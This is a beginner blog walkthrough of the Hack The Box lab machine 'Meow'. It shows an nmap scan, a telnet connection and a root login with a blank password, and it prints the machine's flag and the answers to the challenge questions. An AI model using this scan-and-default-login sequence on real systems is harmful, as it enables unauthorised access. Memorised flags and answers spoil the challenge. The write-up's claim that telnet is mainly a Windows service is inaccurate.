Hack The Box: Machines – Meow

Dear Friend, welcome to HaXeZ where today we’re looking at one of the Hack The Box Machines called Meow. This machine is part of the Tier 0 starting point boxes and is regarded as a very easy box. Additionaly, there are a number of questions that you need to answer in order to complete this machine. First we need to connect to the VPN. In order to do that click on the Starting Point link and download the OpenVPN files.

Download VPN
Download VPN

Connect To The Hack The Box VPN

Once you have the files downloaded, put them in your Virtual Machines shared folder. If you don’t know where that is then please see my guide on creating a virtual machine shared folder. Once the file is in your shared folder, boot your Virtual Machine and log in. Next you need to either navigate to the mount point of your shared folder or put the full file path in the following command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ ls
starting_point_HaXeZ.ovpn                                                                                                                                                                                    
┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ sudo openvpn starting_point_HaXeZ.ovpn
2022-04-29 08:28:32 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
---SNIP---
2022-04-29 08:41:55 Initialization Sequence Completed

You should have now successfully complete the first challenge.

Connect To VPN
Connect To VPN

Spawn The Machine

Further down the page you should see question two with an option to spawn the box. Click on the spawn the box link and it should do just that. Additionally, once the box has been spawn you should see an IP address. Essentially, this is the address for the box that we will use to communicate with it.

Spawn Machine
Spawn Machine

You can now probably answer the next few questions too. The next one should be what does the acronym VM stand for? The answer is Virtual Machine.

Virtual Machine Acronym
VM Acronym

The next question is what tool do we use to interact with the operating system in order to start our VPN connection? That will be the terminal.

VPN Service
VPN Service

After that, it asks What is the abbreviated name for a tunnel interface in the output of your VPN boot-up sequence output? You can find this out by running ifconfig on your virtual machine. If snipped out my eth0 and loop back address and some other information but you can see that the abbreviated name is tun.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
inet 10.10.15.119  netmask 255.255.254.0  destination 10.10.15.119
tun machine Interface
tun Interface

Ping The Machine

Now that the box has been spawn and you know its address, it’s time to see whether we can talk to it. In order to do that we’re going to use the ‘ping’ command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo ping 10.129.122.207 | tee -a ping.txt
PING 10.129.122.207 (10.129.122.207) 56(84) bytes of data.
64 bytes from 10.129.122.207: icmp_seq=1 ttl=63 time=15.6 ms

Which should now allow you to answer the next question which is what tool do we use to test our connection to the target? The answer is ping.

Ping Machine
Ping Machine

NMAP The Machine

Next we need to find out what services are available for us to talk to on the box. In order to do that we will use NMAP.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo nmap -sC -sV -p- 10.129.122.207 | tee -a nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 08:42 EDT
Nmap scan report for 10.129.122.207
Host is up (0.036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Furthermore, you should now be able to answer the next question which is what is the name of the tool we use to scan the targets ports? The answer is nmap.

nmap the machine
nmap tool

Telnet To The Box

The results from the nmap scan showed us that port 23 or telnet is open on the box. There were no other services listening so we should attempt to connect to telnet to see what’s running. In order to do this we need to type the telnet command followed by the ip address and then the port. Include spaces between each entity.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect

After a bit of time waiting, we are greeted with an ascii hack the box logo. This should allow you to answer the next question which is what service do we identify on port 23/tcp during our scans? The answer is telnet.

Telnet
Telnet

Login To The Box

We now need to login to the box but we don’t have any credentials. However telnet is predominantly a windows service so we can try logging in with Administrator or admin but those don’t work. However, if we try logging in as root with a blank password then we are successfully authenticated.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

After logging in we can see that the box is in fact Linux and running the Ubuntu operating system. We should now be able to answer the next question which is what username ultimately works with the remote management login prompt for the target. The answer is root.

root user
root user

Capture The Flag

Finally we now need to capture the flag. Fortunately they haven’t hidden it from us and we list out the directory we are currently in and see the file. Then all we need to do is cat that file and submit the flag to the web page.

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
[email protected]:~# ls
flag.txt  snap
[email protected]:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
[email protected]:~#
Capture the flag

And that’s it, you should now have pwned meow and can move on to the next box. Congratulations.

Meow has been pwnd